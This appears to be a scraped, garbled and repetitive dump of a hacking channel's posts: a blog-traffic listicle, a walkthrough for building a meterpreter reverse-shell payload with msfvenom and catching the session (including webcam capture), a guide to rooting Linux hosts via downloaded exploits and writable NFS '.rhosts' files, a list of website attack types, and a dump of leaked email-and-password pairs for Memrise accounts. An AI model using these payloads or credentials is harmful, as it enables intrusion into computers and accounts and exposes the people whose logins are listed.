This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the results
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTesting
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the results
Explore the market in affordable ways. Publish the results in white paper format - this is a small instruction book to solve a specific problem.
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE... @UndercodeTesting @DailyCve @iUndercode
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hACK a LINUX fULL gUIDE BY UndercOde :
fb.com/UndercOdeTesting
The most reliable. Open up on the ports
and check the version of daemons (UNIX) or servers (Win NT).
If it is of type IMAP, sendmail, Apache, QPOP then this is UNIX. If
IIS, Microsoft FTP, etc. then this is Win NT.
1) So the first thing is
done. OS we have. The second thing you have
to do is scan all the ports. This can also be
done with the Shadow Scan and nmap programs.
Pay particular attention to sendmail, qpop, imap, rlogin, ssh, mount, named, amd, talk.
2) Now run to the dump of exploits :). Exploit is a
utility that implements undocumented or closed functions in a program.
You can run away to rootshell , technotronic , etc.Also , I highly recommend visiting BUGTRAQ . Look for
exploits for your version. For example, if
any sendmail,
9.8.9./9.8.9 is installed on the host,
then the exploit for sendmail 3.4.3./3.4.3 is not
will work :)). The versions should match exactly
(this is for * nix, but there are also exploits for NT, although NT
has more interesting things like null session, SMBShare,
NETBios, but we'll talk about this another time)
2) Usually exploits
are written in C, so we use the
gcc command (compiler). For example, you downloaded the
sux.c. exploit . The easiest compilation option:
# gcc -o sux sux.c
3) Now run
it with the command:
# ./sux victim_name
4) Additional options in the team may also be required.
If you succeed, you will get a shell and your UID and GID will
be 0 (root). Here you are superuser :). But
exploits are not all. NFS can still help
5) Look with showmount command the shared resources of the
attacked host. For instance:
# showmount -e
attacked_host_name
6) You see, for example:
/ usr
/ var (everyone)
/ home (everyone)
7) Now it's time to mount home ((everyone) says that the directory is accessible to anyone via NFS). Mount:
# mount
attacked_host_name: / home / mnt
Where / mnt is the name of your
folder on your computer for installation. Now you can
create a
.rhosts file with the contents of '+ +' in the folder of a user . All you can easily
8) log in to the network using rlogin. And this is just an example.
In principle, you can hack or tamper with a system
from almost any folder. You just need
to brainwash it.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hACK a LINUX fULL gUIDE BY UndercOde :
fb.com/UndercOdeTesting
The most reliable. Open up on the ports
and check the version of daemons (UNIX) or servers (Win NT).
If it is of type IMAP, sendmail, Apache, QPOP then this is UNIX. If
IIS, Microsoft FTP, etc. then this is Win NT.
1) So the first thing is
done. OS we have. The second thing you have
to do is scan all the ports. This can also be
done with the Shadow Scan and nmap programs.
Pay particular attention to sendmail, qpop, imap, rlogin, ssh, mount, named, amd, talk.
2) Now run to the dump of exploits :). Exploit is a
utility that implements undocumented or closed functions in a program.
You can run away to rootshell , technotronic , etc.Also , I highly recommend visiting BUGTRAQ . Look for
exploits for your version. For example, if
any sendmail,
9.8.9./9.8.9 is installed on the host,
then the exploit for sendmail 3.4.3./3.4.3 is not
will work :)). The versions should match exactly
(this is for * nix, but there are also exploits for NT, although NT
has more interesting things like null session, SMBShare,
NETBios, but we'll talk about this another time)
2) Usually exploits
are written in C, so we use the
gcc command (compiler). For example, you downloaded the
sux.c. exploit . The easiest compilation option:
# gcc -o sux sux.c
3) Now run
it with the command:
# ./sux victim_name
4) Additional options in the team may also be required.
If you succeed, you will get a shell and your UID and GID will
be 0 (root). Here you are superuser :). But
exploits are not all. NFS can still help
5) Look with showmount command the shared resources of the
attacked host. For instance:
# showmount -e
attacked_host_name
6) You see, for example:
/ usr
/ var (everyone)
/ home (everyone)
7) Now it's time to mount home ((everyone) says that the directory is accessible to anyone via NFS). Mount:
# mount
attacked_host_name: / home / mnt
Where / mnt is the name of your
folder on your computer for installation. Now you can
create a
.rhosts file with the contents of '+ +' in the folder of a user . All you can easily
8) log in to the network using rlogin. And this is just an example.
In principle, you can hack or tamper with a system
from almost any folder. You just need
to brainwash it.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 138 likes Β· 13 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTesting
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permissionsπ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTesting
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permissionsπ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 138 likes Β· 13 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Memrise Premium Accounts VERIFIED !
t.me/UndercodeTesting
eric.wupub@gmail.com:Wxf690609 | Username: = XXXFW | Premium: = true
niclas.bornschein@gmail.com:amelie01 | Username: = RhymZ | Premium: = true
kelley.mohr@hotmail.com:December27 | Username: = kelleymohr | Premium: = true
hajduzoli@gmail.com:19 (hajduzoli@gmail.com:19)Balint96 | : Username: = hajduzoli | Premium: = true
harunaniikura@hotmail.fr:Lokinroll10 | Username: = HarunaMizeNiikura65 | Premium: = true
michu2233@gmail.com:reload123 | Username: = Offeris | Premium: = true
mcgdamour@aol.com:BOUBY1ER Username: = LABELETTE1ERE | Premium: = true
csjacobson02@me.com:ShyAnne22 | Username: = csjacobson02 | Premium: = true
rudy2be@gmail.com:4 (rudy2be@gmail.com:4)fnmzx7mb | : Username: = Rudy_EscarriaJr92 | Premium: = true
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Memrise Premium Accounts VERIFIED !
t.me/UndercodeTesting
eric.wupub@gmail.com:Wxf690609 | Username: = XXXFW | Premium: = true
niclas.bornschein@gmail.com:amelie01 | Username: = RhymZ | Premium: = true
kelley.mohr@hotmail.com:December27 | Username: = kelleymohr | Premium: = true
hajduzoli@gmail.com:19 (hajduzoli@gmail.com:19)Balint96 | : Username: = hajduzoli | Premium: = true
harunaniikura@hotmail.fr:Lokinroll10 | Username: = HarunaMizeNiikura65 | Premium: = true
michu2233@gmail.com:reload123 | Username: = Offeris | Premium: = true
mcgdamour@aol.com:BOUBY1ER Username: = LABELETTE1ERE | Premium: = true
csjacobson02@me.com:ShyAnne22 | Username: = csjacobson02 | Premium: = true
rudy2be@gmail.com:4 (rudy2be@gmail.com:4)fnmzx7mb | : Username: = Rudy_EscarriaJr92 | Premium: = true
β β β ο½ππ»βΊπ«Δπ¬πβ β β β